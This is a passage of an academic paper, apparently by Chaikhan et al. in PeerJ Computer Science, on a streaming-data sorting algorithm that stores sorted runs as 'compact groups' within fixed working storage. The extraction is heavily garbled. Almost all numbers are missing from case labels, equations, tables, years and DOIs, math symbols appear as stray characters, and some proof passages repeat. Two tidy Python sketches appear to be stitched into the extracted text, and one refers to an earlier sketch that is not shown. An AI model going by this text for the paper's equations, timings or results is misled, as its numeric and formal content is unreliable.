; Þ obviously, the value of c ¼ ph t¼ s ð Þ t is larger than that of c , c , and c . case (type- ): suppose the sorted sequence w(t) = (w , w , …, wh) is in type- . then, we have the following four sequences of the status condition. tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ obviously, the value of c ¼ ph t¼ s ð Þ t is larger than that of c , c , and c . case (type- ): suppose the sorted sequence w(t) = (w , w , …, wh) is in type- . then, we have the following four sequences of the status condition. tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ tð Þ ¼ sð Þ ¼ ; sð Þ ¼ ; sð Þ ¼ ; . . . ; sð Þh ¼ � � or ð ; ; ; . . . ; Þ obviously, the value of c ¼ ph t¼ s ð Þ t is larger than that of c , c , and c .▪ chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ inserting numbers into the combination set of compact groups after creating the first combination set of compact group q( ) and obtaining a new incoming sequence, the current compact groups must be updated according to the number in the incoming sequence. there are seven possible cases where a new incoming number can be inserted into any compact group or in between a compact group and a single number. let the a new incoming number da is located according to each case as follows. q(t) is the set of combinations of compact groups and a set of single numbers at time t. case : da is at the front of q (t). case : da is at the rear of q (t). case : da is in a compact group (uj, vj) (p). case : da is in between two compact groups (uj, vj) (pj) and (uk, vk) (pk). case : da is in between a single number wj and a compact group (uk, vk) (pk). case : da is in between a compact group (uj, vj) (pj) and a single number wk. case : da is in between two single numbers wj and wj + . the details of each case and the insertion steps are in given in algorithm . experimental results and discussion three issues are discussed in this section. the first issue illustrates the snapshot of sorting outcomes as the results of incoming data chunks, current compact groups of different types, and sets of single numbers. the second issue discusses the relation between the sorting time and the number of streaming numbers. the third issue shows how the size of working storage changes during the sorting process. sorting examples the proposed algorithms are implemented in matlab r a. the computing results are run on . ghz intel core i and gb of mhz ram with the windows platform. to illustrate how the proposed algorithm works, three experiments were conducted by using a set of single integers ranging from to . these numbers were randomly permuted to produce three different experimental data sets. the total size of storage is assumed to have only working addresses. forty of them are used for storing temporary data generated during the sorting process, which includes wðtÞ, w(t), and q(t) at different times. the rest of storage is for storing some variables in the sorting program. 
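as a complement to the seven insertion cases enumerated above, the following sketch locates where a new number dα falls with respect to the current combination set q(t) of compact groups and single numbers. the decision logic and the names are an illustrative reconstruction under the same unit-step assumption as the earlier compact-group sketch, not the authors' code.

```python
from dataclasses import dataclass

@dataclass
class CompactGroup:
    """minimal unit-step compact group (u, v), as in the earlier sketch."""
    u: int
    v: int
    def contains(self, x):
        return self.u <= x <= self.v

def low(e):
    """smallest value covered by an element of q(t)."""
    return e.u if isinstance(e, CompactGroup) else e

def high(e):
    """largest value covered by an element of q(t)."""
    return e.v if isinstance(e, CompactGroup) else e

def identify_case(q, d):
    """return the insertion case (1-7) of a new number d with respect to the
    ordered combination set q of compact groups and single numbers."""
    if d < low(q[0]):
        return 1                                  # case 1: front of q(t)
    if d > high(q[-1]):
        return 2                                  # case 2: rear of q(t)
    for left, right in zip(q, q[1:]):
        if isinstance(left, CompactGroup) and left.contains(d):
            return 3                              # case 3: inside a compact group
        if high(left) < d < low(right):
            lg = isinstance(left, CompactGroup)
            rg = isinstance(right, CompactGroup)
            if lg and rg:
                return 4                          # case 4: between two compact groups
            if not lg and rg:
                return 5                          # case 5: single number, then group
            if lg and not rg:
                return 6                          # case 6: group, then single number
            return 7                              # case 7: between two single numbers
    if isinstance(q[-1], CompactGroup) and q[-1].contains(d):
        return 3
    raise ValueError("d duplicates a value already represented in q(t)")

# example with q(t) = ((4,8), 11, (14,16), 20)
q = [CompactGroup(4, 8), 11, CompactGroup(14, 16), 20]
print([identify_case(q, d) for d in (2, 25, 6, 12, 9)])   # -> [1, 2, 3, 5, 6]
```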
to illustrate the continuous results during the sorting process, three data sets in the experiment were generated from three permutations of integer numbers from to to avoid any duplication. these permuted numbers are sliced into a set of input chunks of at most numbers in each chunk. let mtotj j be the total size of the working storage, which is equal to in the experiment. the experimental results are shown in fig. , where the x-axis represents each wi in w (t) and q(t) and the y-axis represents the time line of iterations. each datum wi is represented by ×. each type of compact group in q (t) is denoted by a solid line with a specific color as follows. type- is denoted by gray line. type- is denoted by blue line. type- is denoted by green line. type- is denoted by red line. chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a single number in the compact window is represented by •. in the first data set, there are numbers entering the process at the starting time. after being grouped by algorithm , the result appears in time step t = (at the line above the bottom line in fig. a. there are four compact groups of type- , two compact groups of type- , three compact groups of type- , and nine single numbers. also, at time t = , there are four new incoming numbers, each of which is represented by ×. algorithm sorts algorithm creating compact groups. input: a sorted sequence w(t) = (wk, wk+ , …, wk+h) of length h at time t. output: a combination of a set of compact groups and a set of single numbers. . j = k. . s = Ø. /* set of single numbers */ . c = Ø. /* set of compact groups */ . q(t) = Ø. . for l = to do /* packing order types , before , */ . c = c = c = c = . . if |wk −wk+ | > then . s = s∪{wk}. . j = k+ . . endif . for i = k+ to k+h− do . if |wi−wi+ | ≤ then . set the values of s( ), s( ), s( ), s( ) by definitions – . . cl = cl +s (l). . c −l = c −l +s ( −l). . else . if j = i then . s = s∪{wj}. /* single number */ . j = i + . . else . p = arg maxi fl; −lg (ci). /* compact types */ . create a compact group (wj, wi) (p). . c = c∪{(wj, wi) (p)}. . c = c = c = c = . . j = i + . . endif . endif . q(t) = q(t)||s||c. . endfor . endfor chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm inserting dα into q(t). input: ( ) set q(t). ( ) a new number da. output: a new q(t+ ). . identify the case of insertion for da. . case: . : if the first element of q(t) is (u , v ) (p ) then . let u be the retrieved (u , v ) (p ) by using eqs. ( ), ( ) and ( ). . else . put d in u. . endif . use algorithm with da and u to generate a new set of elements. . endcase . : if the last element of q(t) is (um, vm) (pm) then . let u be the retrieved (um, vm) (pm) by using eqs. ( ), ( ) and ( ). . else . put dm in u. . endif . use algorithm with da and u to generate a new set of elements. . endcase . : let u be the retrieved (um, vm) (pm) by using eqs. ( ), ( ) and ( ). . use algorithm with da and u to generate a new set of elements. . endcase . : let u be the retrieved (uj, vj) (pj) by using eqs. ( ), ( ) and ( ). . let v be the retrieved (uk, vk) (pk) by using eqs. ( ), ( ) and ( ). . use algorithm with da, u and v to generate a new set of elements. . endcase . : let u be the retrieved (uk, vk) (pk) by using eqs. ( ), ( ) and ( ). . use algorithm with da, wj and u to generate a new set of elements. . endcase . 
: let u be the retrieved (uj, vj) (pj) by using eqs. ( ), ( ) and ( ). . use algorithm with da, u and wk to generate a new set of elements. . endcase . : use algorithm with da, wj and wk to generate a new set of elements. . endcase . repeat . use algorithm with the new set of elements and the unpacked element next to the new set next to the new set of elements to generate the next new set of elements in q(t). . until no more new elements. . rename q(t) as q(t+ ). . endcase chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ all incoming numbers appearing in various chunks within only time steps, whereas it takes and time steps for the second and the last data sets, respectively. execution time vs working storage size in this experiment, the relation between the total numbers to be sorted and the sorting time was investigated. the total storage, mtot, is partitioned into two portions. the first portion, mprog, is for the sorting program. the size of mprog is fixed throughout the sorting process. the second portion, mwork, is the working storage for storing all compact groups, sets of single numbers, and other relevant variables occurring during in the sorting algorithm. since the sorting time directly depends upon the size of mwork, the size of mwork is thus set as a function of the total numbers to be sorted. let n ≫|mwork| be the total figure snapshots of sorting results from three different permuted data sets, each of which contains numbers. (a) the time steps of the sorting result of data set . (b) the time steps of the sorting result of data set . (c) the time steps of the sorting result of data set . full-size doi: . /peerj-cs. /fig- chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ numbers to be sorted. all numbers to be sorted flow gradually and continuously into the working storage one chunk at an initial time. to investigate the execution time of the sorting process with respect to the quantity of numbers and |mwork|, the size of mwork is set in terms of n as follows. jmworkj ¼ g � n ( ) where γ ∈ { . , . , . , . } and n ∈ { , , , }. table summarizes the proposed sorting algorithm time of different quantities of incoming numbers with respect to the different sizes of the working memory. the incoming numbers were randomly generated and permuted. no duplicated numbers appear in the data sets. to visualize the trend of the sorting time vs the size of data sets, fig. shows the log-scaled trend of each data set. there are four lines in blue, red, yellow, and purple representing different sizes of mwork. note that the sorting time of each data set linearly figure log-scaled sorting execution time in seconds for different sizes of working storage n = , , and . full-size doi: . /peerj-cs. /fig- table sorting execution time of the proposed algorithm with respect to size of working storage. n execution time (s) γ = % γ = % γ = % γ = % . . . . . . . . . . . . . . . , . chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ increases. then, the experiment has a linear polynomial time complexity of o(n). table summarizes the time of external sorting of different quantities of incoming numbers with respect to the different sizes of buffer. 
the execution time of proposed sorting algorithm is approximately . times faster than the execution time of external sorting at a million data when storage size is limited to %. furthermore, the proposed algorithm run on gb of numeric data takes about . days. fluctuation of compact groups and single number sets since the proposed sorting algorithm is designed to cope with a streaming data environment where the set of numbers to be sorted can overflow the working storage and the chunks of numbers gradually flow into the working storage, there are three interesting behavioral periods concerning the number of compact groups and sets of single numbers created during the sorting process. it is remarkable that the number of compact groups and sets of single numbers increase during the beginning period due to random values of incoming numbers. the length of beginning period depends upon the random sequence of numbers, which is unpredictable. after the beginning period, some new incoming numbers may fall into the existing compact groups and some of them may form new compact groups with some sets of single numbers. some existing compact groups can be merged with new compact groups created from some sets of single numbers into new compact groups. these conditions make the number of compact groups almost stable for some period of time. in the last period, those new incoming numbers obviously fall to combine with the existing compact groups. some sequences of compact groups are possibly merged into new compact groups with more elements in the groups. thus, the number of compact groups decreases until there is one compact group that contains all sorted numbers. figure illustrates the fluctuation of compact groups with sets of single numbers vs the time steps for different sizes of working storage. during the sorting process, the number of compact groups and sets of single numbers increases and decreases. the fluctuation of used and unused areas of working storage of the results in fig. is summarized in fig. . notice that the proposed algorithm can reduce the working space to % of the data size. in the other words, the working space of the proposed algorithm is % of the data size. comparison of storage size used and correctness of sorted order regardless of the sorting types, either exact sort or approximate sort, the order of each number in the sorted list must be correct according to the value of each number for table sorting execution time of external sorting with respect to buffer size. n execution time (s) buffer = % buffer = % buffer = % buffer = % . . . . . . . . . . . . , . , . , . , . chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure snapshot of fluctuation of unused area of working storage at a million data during the sorting period for different sizes of working storage. full-size doi: . /peerj-cs. /fig- figure snapshot of fluctuation of compact groups and sets of single numbers at a million data during the sorting period for different sizes of working storage. full-size doi: . /peerj-cs. /fig- chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ both ascending and descending sorts. if it is not so, the sorted list is useless in any applications. 
to verify the efficiency and the accurate order of sorted numbers as the result of proposed streaming data sort in a streaming data environment with limited storage size, the result was compared with the result of approximate sorting algorithm (farnoud, yaakobi & bruck, ) capable of handling streaming data, and external sorting. the following set of numbers was experimented: { , , , , , , , , , , , , , , , , , , , }. in order to simulate streaming data, the set of numbers was decomposed into several consecutive chunks. the first incoming chunk contains nine numbers. the other following chunks contain only one number. two issues concerning the change of storage size during the sorting process and the wrong sorted order were recorded in the experiment. since streaming data sort algorithm uses only one working storage of fixed size throughout the sorting process, there is no change of storage size for this algorithm. but in case of approximate sorting and external sorting algorithms, both of them require working storage of fixed size and also external storage of variable size. hence, the change of storage size only occurs in the external storage. figure snapshots the storage size change at each time. mwork is a constant denoting the fixed size of working storage. the size of external storage is expandable according to the amount of temporary data generated during the sorting algorithms. it is remarkable that the proposed streaming data sort does not require any space in the external storage. only working storage space alone is enough to complete the sorting figure comparison of storage size change as the results of sorting a set of streaming data by the proposed streaming data sort algorithm, approximate sorting (farnoud, yaakobi & bruck, ) algorithm and external sorting. full-size doi: . /peerj-cs. /fig- chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ process. but both approximate sorting and external sorting need some additional spaces in the external storage. these spaces keep increasing when there are more incoming numbers to be sorted. the sorted order of all numbers obtained from streaming data sort is perfectly correct. but the sorted orders of numbers , , , obtained from approximate sorting are not correct. although the sorted order obtained from external sorting is perfectly correct, this algorithm requires a large size of external storage which is impractical for streaming data environment. time complexity analysis there are two main phases in the sorting process. the first phase is to sort the first incoming chunk of numbers to obtain the first set of compact groups as well as sets of single numbers. the second phase is to sort the consequent chunks with the existing compact groups and single numbers. let h ≤ |mwork| be the size of each input chunk. the time complexity of each phase is as follows. phase : the operation of this phase is in algorithm . obtaining h numbers takes o(h). these h numbers must be sorted to create compact groups and sets of single numbers. the time to sort h numbers is o(h log (h)). after sorting, the time to create compact groups and sets of single numbers takes o(h). thus, the time of this phase is o(h) + o(h log(h)) + o(h) = o(h log(h)). phase : from algorithm , all compact groups at any time are in set c, and all single numbers are in set s. the time complexity of this phase can be analyzed from algorithm . 
there are seven cases to be identified for inserting a new number da at step . the identifying time takes o(|c|) + o(|s|) ¼ maxðoðjcjÞ; oðjsjÞÞ. then, applying eqs. ( ), ( ) and ( ) to retrieve the numbers from a compact group takes o( ). after retrieval of the numbers, algorithm is applied to create a new compact group and a set of single numbers with the new incoming da. this step takes at most o(h). at steps – , algorithm is repeatedly applied to update sets c and s. this takes at most o(h×|c|) + o(|s|). since |c| ≤ h and |s| ≤ h, the time complexity of steps – is o(h ). thus, phase takes max(o(|c|), o(|s|)) + o( ) + o(h) + o(h ) = o(h ) for each da. if there are in total n numbers to be sorted, then the time complexity is o(h log(h)) + o((n − h) × h ) = o(nh ). however, h is a constant. hence, the time complexity of the sorting process is o(n). storage usage analysis the behavior of storage usage is in the form of a capsized bell shape, as shown in fig. . the descriptive rationale behind this behavior was briefly provided in fluctuation of compact groups and single number sets section. this section will theoretically analyze this behavior based on the probability of all seven cases for a compact group. suppose there are n total streaming numbers to be sorted. all incoming n numbers are assumed to be randomly permuted and partitioned into nh input chunks of size h each. let ni be the numbers in the ith input data chunk. after obtaining the first input data chunk, the probability of each case for the next new incoming number da for any compact group qi is as follows. chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ case : da is at the front of qi. the probability of case is calculated by the probability of picking da from n − n and the probability of having da in the next input chunk. the probability of picking da from n − n numbers is n�n . however, if da is the next new incoming number, then da must be in the next input data chunk. the probability that da is in the next input chunk is n h� . thus, the probability of case is as follows. p ¼ n � n � n h � ( ) case : da is at the rear of qi. the probability of case can be analyzed as that of case . case : da is in a compact group qi, types , , and are compact groups only. if qi is a type- compact group, then the probability that da is in qi is �jqij � � n�n , where |qi| represents the numbers compacted in qi. if qi is a type- compact group, then the probability that da is in qi is �jqij � � n�n . if qi is a type- compact group, then the probability that da is in qi is jqij� ð Þ n�n . p ¼ �jqij � � n � n � n h � types or jqij � n � n � n h � type : >>< >>: ( ) case : da is in between two compact groups qi and qi + . the probability of case can be analyzed as that of case . case : da is in between a single number wj and a compact group qi. if qi is a type- compact group, then the probability that da is in qi is n�n . if qi is a type- compact group, then the probability that da is in qi is n�n . if qi is a type- compact group, then the probability that da is in qi is n�n . if qi is a type- compact group, then the probability that da is in qi is n�n . the probability of case can be analyzed as that of case . case : da is in between a compact group qi and a single number wk. the probability of case can be analyzed as that of case . case : da is in between two single numbers wj and wj + . the probability of case can be analyzed as that of case . 
note that the probability of all cases for the first input data chunk is written as follows. p ¼ jqij � � � n � n � n h � case ðtype or type Þ jqij � n � n � n h � case ðtype Þ n � n � n h � other cases >>>>>>< >>>>>>: ( ) after the first input data chunk, the probability of each case after m next input data chunks can be written in a generic form as follows. chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ p ¼ jqij � � � n � pmi¼ ni � n h � m case ðtype or type Þ jqij � n � pmi¼ ni � n h � m case ðtype Þ n � pmi¼ ni � n h � m other cases >>>>>>< >>>>>>: ( ) note that the value n � pmi¼ ni and nh � m will finally approach . this implies that the number of compact groups decreases and eventually there should be only one compact group. however, the time during which the probability approaches depends upon the value of h, as shown in fig. . if h is large, then the chance that an input chunk contains a tentative sorted sequence is also high. theorem the only possible existing case to be tested for the last incoming data chunk is case , case , case , case , case , or case . proof: the only probability approaching is the probability of case , case , case , case , case , and case as defined in eqs. ( ).▪ conclusion this study proposed a concrete concept and practical algorithm to sort streaming numbers in the case where the total numbers overflow the actual storage. no secondary storage is involved in this constraint. the size of the working storage, h, for sorting is fixed figure probability of cases , , , , and of data where h = . full-size doi: . /peerj-cs. /fig- chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ throughout the sorting event. the incoming numbers are captured by new proposed data architectures in the forms of sets of single numbers and compact groups of sorted numbers. the actual order of each number with respect to the total numbers, n, in the streaming sequence can be correctly retrieved within o(h). the time complexity of the proposed algorithm is o(n), and the space complexity is o(m). from the experiments, it was found that the proposed algorithm can correctly and stably handle the streaming data size of at least . times larger than the size of the working storage. furthermore, the sorted order obtained from the proposed algorithm is absolutely correct, no approximate order. in addition, each number can be directly retrieved from any compact group by its type. the analysis of dynamic change of used and unused working storage areas during the sorting process was also provided. although the proposed algorithm is primarily designed for a single processor, the proposed algorithm can be practically extended to be implemented on a multiprocessor architecture with a slight modification. in the case of a multiprocessor architecture, more than one chunk of data can simultaneously flow into the machine by one chunk per processor. the proposed algorithm can be deployed by each processor to sort each incoming chunk and to merge the final sorted results from all processors later. in fact, there are several real applications requiring this kind of sorting process where the data always overflow the working memory. some applications are the followings: . 
managing tremendous information inside large organizations by sorting transactions according to account numbers, locations of customers, date stamp, price or popularity of stock, zip code or address of mail, and so on (sedgewick & wayne, ). the proposed algorithm can reduce memory storage for keeping those data. . reducing the search time of huge streaming data by sorting the data first and representing them in compact groups as implemented in streaming data sort algorithm. . computing order statistics, quartile, decile, and percentile of big streaming data continuously flowing into an internet-scale network monitoring system and database query optimization (buragohain & suri, ). . checking duplicated data for fraud detection or fake social engagement activities such as bidding on an item, filling out a form, clicking an advertisement, or making a purchase (metwally, agrawal & el abbadi, ; li et al., ). even though the proposed streaming data sort successfully sorts the streaming data under the defined constraints but some of the following further studies of streaming data sorting based on other constraints can be pursued. . developing a new structure of compact group whose type can be adapted to any arbitrary different value of two temporal consecutive numbers. . extending the sorting concept to cope with various data types such as a character string or a floating point number which exist in other engineering, scientific, and business problems. chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding this work was supported by development and promotion of science and technology talents project (dpst) and thailand research fund under grant number rta . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: development and promotion of science and technology talents project (dpst). thailand research fund: rta . competing interests the authors declare that they have no competing interests. author contributions � suluk chaikhan conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � suphakant phimoltares conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � chidchanok lursinsap conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data, including permutations of random integers, are available at the uci repository (https://archive.ics.uci.edu/ml/datasets.php). specifically: - beijing pm . data data set: https://archive.ics.uci.edu/ml/datasets/beijing+pm . +data - census income data set: http://archive.ics.uci.edu/ml/datasets/census+income - covertype data set: https://archive.ics.uci.edu/ml/datasets/covertype - diabetes data set: https://archive.ics.uci.edu/ml//datasets/diabetes - pm . data of five chinese cities data set: https://archive.ics.uci.edu/ml/datasets/ pm . 
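as a small illustration of the order-statistics application mentioned above, the k-th smallest value can be read directly from data kept in compact form, without expanding the removed data. the sketch assumes unit-step compact groups stored as (u, v) pairs and is only an illustration, not code from the paper.

```python
def kth_smallest(q, k):
    """return the k-th smallest value (1-based) represented by an ordered
    combination set q of unit-step compact groups (u, v) and single numbers,
    without materialising the removed data."""
    for element in q:
        if isinstance(element, tuple):          # a compact group (u, v)
            u, v = element
            count = v - u + 1
            if k <= count:
                return u + k - 1                # k-th element inside the run
            k -= count
        else:                                   # a single number
            if k == 1:
                return element
            k -= 1
    raise IndexError("k exceeds the number of represented values")

# example: q represents 1..5, 8, 10..12, 20 with only six storage cells
q = [(1, 5), 8, (10, 12), 20]
print([kth_smallest(q, k) for k in range(1, 11)])
# -> [1, 2, 3, 4, 5, 8, 10, 11, 12, 20]
```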
+data+of+five+chinese+cities - incident management process enriched event log data set: https://archive.ics.uci.edu/ml/datasets/incident+management+process+enriched+event+log - kegg metabolic relation network (directed) data set: https://archive.ics.uci.edu/ml/ datasets/kegg+metabolic+relation+network+(directed) chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://archive.ics.uci.edu/ml/datasets.php https://archive.ics.uci.edu/ml/datasets/beijing+pm . +data http://archive.ics.uci.edu/ml/datasets/census+income https://archive.ics.uci.edu/ml/datasets/covertype https://archive.ics.uci.edu/ml//datasets/diabetes https://archive.ics.uci.edu/ml/datasets/pm . +data+of+five+chinese+cities https://archive.ics.uci.edu/ml/datasets/pm . +data+of+five+chinese+cities https://archive.ics.uci.edu/ml/datasets/incident+management+process+enriched+event+log https://archive.ics.uci.edu/ml/datasets/kegg+metabolic+relation+network+(directed) https://archive.ics.uci.edu/ml/datasets/kegg+metabolic+relation+network+(directed) http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ - kegg metabolic reaction network (undirected) data set: https://archive.ics.uci.edu/ ml/datasets/kegg+metabolic+reaction+network+(undirected) - buzz in social media data set: https://archive.ics.uci.edu/ml/datasets/buzz+in+social +media+. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references agrawal a, sriram b. . concom sorting algorithm. in: th international conference on computer science and network technology. vol. . – . al-fuqaha a, guizani m, mohammadi m, aledhari m, ayyash m. . internet of things: a survey on enabling technologies, protocols, and applications. ieee communications surveys & tutorials ( ): – doi . /comst. . . babcock b, babu s, datar m, motwani r, widom j. . models and issues in data stream systems. in: proceedings of the twenty-first acm sigmod-sigact-sigart symposium on principles of database systems, pods ’ . new york, – . bey ahmed khernache m, laga a, boukhobza j. . montres-nvm: an external sorting algorithm for hybrid memory. in: ieee th non-volatile memory systems and applications symposium (nvmsa). piscataway: ieee, – . buragohain c, suri s. . quantiles on streams. in: encyclopedia of database systems. new york: springer-verlag us, – . cardenas a, manadhata p, rajan s. . big data analytics for security. ieee security & privacy ( ): – doi . /msp. . . cormen th, leiserson ce, rivest rl, stein c. . introduction to algorithms. third edition. cambridge: the mit press. dave m, gianey h. . different clustering algorithms for big data analytics: a review. in: international conference system modeling & advancement in research trends. – . dua d, graff c. . uci machine learning repository: school of information and computer science. irvine: university of california. elder m, goh yk. . permutations sorted by a finite and an infinite stack in series. in: international conference on language and automata theory and applications. – . farnoud f, yaakobi e, bruck j. . approximate sorting of data streams with limited storage. journal of combination optimization : – . faro s, marino fp, scafiti s. . fast-insertion-sort: a new family of efficient variants of the insertion-sort algorithm. in: sofsem (doctoral student research forum). – . franceschini g. . proximity mergesort: optimal in-place sorting in the cache-oblivious model. 
in: proceedings of the fifteenth annual acm-siam symposium on discrete algorithms, soda. vol. . new york: acm, – . gantz j, reinsel d. . the digital universe in : big data, bigger digital shadows, and biggest growth in the far east. idc iview: idc analyze the future ( ): – . goel s, kumar r. . brownian motus and clustered binary insertion sort methods: an efficient progress over traditional methods. future generation computer systems ( ): – doi . /j.future. . . . chaikhan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://archive.ics.uci.edu/ml/datasets/kegg+metabolic+reaction+network+(undirected) https://archive.ics.uci.edu/ml/datasets/kegg+metabolic+reaction+network+(undirected) https://archive.ics.uci.edu/ml/datasets/buzz+in+social+media+ https://archive.ics.uci.edu/ml/datasets/buzz+in+social+media+ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /comst. . http://dx.doi.org/ . /msp. . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ huang x, liu z, li j. . array sort: an adaptive sorting algorithm on multi-thread. journal of engineering ( ): – doi . /joe. . . idrizi f, rustemi a, dalipi f. . a new modified sorting algorithm: a comparison with state of the art. in: th mediterranean conference on embedded computing. – . kanza y, yaari h. . external sorting on flash storage: reducing cell wearing and increasing efficiency by avoiding intermediate writes. vldb journal ( ): – doi . /s - - - . katal a, wazid m, goudar r. . big data: issues, challenges, tools and good practices. in: sixth international conference on contemporary computing. – . kehoe b, patil s, abbeel p, goldberg k. . a survey of research on cloud robotics and automation. ieee transactions on automation science and engineering ( ): – . keim d, qu h, ma k-l. . big-data visualization. ieee computer graphics and applications ( ): – . laga a, boukhobza j, singhoff f, koskas m. . montres: merge on-the-run external sorting algorithm for large data volumes on ssd based storage systems. ieee transactions on computers ( ): – . lee y-s, quero lc, kim s-h, kim j-s, maeng s. . activesort: efficient external sorting using active ssds in the mapreduce framework. future generation computer systems : – . li y, martinez o, chen x, li y, hopcroft je. . in a world that counts: clustering and detecting fake social engagement at scale. republic and canton of geneva: international world wide web conferences steering committee. liang y, chen t, chang y, chen s, wei h, shih w. . b*-sort: enabling write-once sorting for non-volatile memory. in: ieee transactions on computer-aided design of integrated circuits and systems. piscataway: ieee. mehmood a, natgunanathan i, xiang y, hua g, guo s. . protection of big data privacy. ieee access : – . metwally a, agrawal d, el abbadi a. . duplicate detection in click streams. in: proceedings of the th international conference on world wide web. – . mohammed as, amrahov a e, Çelebi fv. . bidirectional conditional insertion sort algorithm; an efficient progress on the classical insertion sort. future generation computer systems : – . osama h, omar y, badr a. . mapping sorting algorithm. in: sai computing conference (sai). – . o’malley o. . terabyte sort on apache hadoop. available at http://sortbenchmark. org/yahoo- hadoop. sedgewick r, wayne k. . algorithms. boston: addison-wesley professional. singh h, sarmah m. . 
comparing rapid sort with some existing sorting algorithms. in: das k, deep k, pant m, bansal j, nagar a, eds. proceedings of fourth international conference on soft computing for problem solving: advances in intelligent systems and computing. vol. . new delhi: springer. tambouratzis t. . a novel artificial neural network for sorting. ieee transactions on systems, man, and cybernetics: part b ( ): – . thusoo a, shao z, anthony s, borthakur d, jain n, sarma j, murthy r, liu h. . data warehousing and analytics infrastructure at facebook. in: proceedings of the acm sigmod international conference on management of data, sigmod . – . vatrapu r, mukkamala rr, hussain a, flesch b. . social set analysis: a set theoretical approach to big data analytics. ieee access : – . vignesh r, pradhan t. . merge sort enhanced in place sorting algorithm. in: international conference on advanced communication control and computing technologies (icaccct). – . witayangkurn a, horanont t, shibasaki r. . performance comparisons of spatial data processing techniques for a large scale mobile phone dataset. yiliang s, zhenghong y. . communication rules learning strategy in big data network based on svn neural network. in: international conference on intelligent transportation, big data & smart city. – . zhai c, zhang y, hu p. . modeling and analysis of material supply network based on big data packed with traffic. in: ieee rd international conference on cloud computing and big data analysis. piscataway: ieee, – . zhao c, chang h, liu q. . bayesian algorithm based traffic prediction of big data services in openflow controlled optical networks. in: ieee nd international conference on big data analysis (icbda). piscataway: ieee, – .
